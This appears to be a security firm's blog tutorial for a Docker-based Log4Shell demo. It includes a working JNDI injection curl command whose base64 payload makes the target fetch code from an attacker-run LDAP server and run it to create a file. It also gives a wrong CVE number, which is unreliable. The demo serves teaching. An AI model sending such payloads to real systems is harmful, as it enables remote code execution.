• FC

How to Build Your Own Log4Shell Demo (CVE-2021-4428)

Our simple explainer of the Log4Shell (CVE-2021-4428) exploit has quickly become our most popular blog post. People really resonated with the cup of coffee analogy and we've had great feedback on the quick demonstration video.


We've had many requests on how to build your own Log4Shell demo to show internal teams. If you watch our video, it's clear you need two things: a vulnerable application and a working LDAP server under your control to deliver the exploit.


The common way to do this is to set up a demonstration in a virtual machine, however these take up huge resources and are hard to share, so let's use Docker for both systems.


The first half - the vulnerable application - is already available as a docker container.

The second half - the LDAP server - isn't, so we spent some time this morning creating one just for you! The reason we have created this container is that the original exploit has been removed and is no longer available for demonstrating the vulnerability.


For your demonstration to work you obviously need Docker running on your system. If you don't already have it, please install that now or the rest won't work. The second thing we need to do is set up a separate Docker network so the two containers can see and talk to each other. I suggest that you have three terminal screens open, one for the Application, one for the LDAP server and one for running other commands, we shall refer to this as the Command Terminal.


Copy and Paste Instructions for the Entire Demo


First, let's set up the Docker network for the demo, in the Command Terminal:


docker network create log4jnetwork


Now, let's grab and run the vulnerable application in the Application Terminal:


docker run --rm --network log4jnetwork --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app


Next, run the 'ls' command in the Command Terminal on the /tmp directory of the vulnerable app, this will show us the 3 files that are in there:


docker exec vulnerable-app ls /tmp

We now need an LDAP server that is under our control and listens on two ports: 1389 and 8888. This command will grab our version of the exploit running on a alpine linux based image with JavaJRE built in, run this in the LDAP Terminal:


docker run --rm --network log4jnetwork --name log4jldapserver -p 1389:1389 -p 8888:8888 cygenta/log4jldap

Finally, we get to trigger the exploit using the command below. This will be sent to the vulnerable app which will then perform the lookup and download the exploit from the LDAP server. The exploit in this case is to create a file in the /tmp folder, so run this in the Command Terminal or a separate new terminal to simulate another machine:


curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://log4jldapserver:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9DeWdlbnRhRGVtbw==}'

And we obviously need to finish by looking back on the vulnerable app server to see if we managed to create the file in the /tmp folder, again run in the Command Terminal:


docker exec vulnerable-app ls /tmp

Watch my quick video walkthrough of the above steps:





One thing to check if you have any issues: please make sure that the names of containers and networks match.


In case you missed it, our original exploit demo video is here:




We would like to thank:

https://github.com/christophetd

https://github.com/feihong-cs

and https://twitter.com/DeathsPirate/ for user testing.


If you've found this blog post helpful, you may want to subscribe to our mailing list. We'd be delighted to keep in touch!



803 views0 comments

Related Posts

See All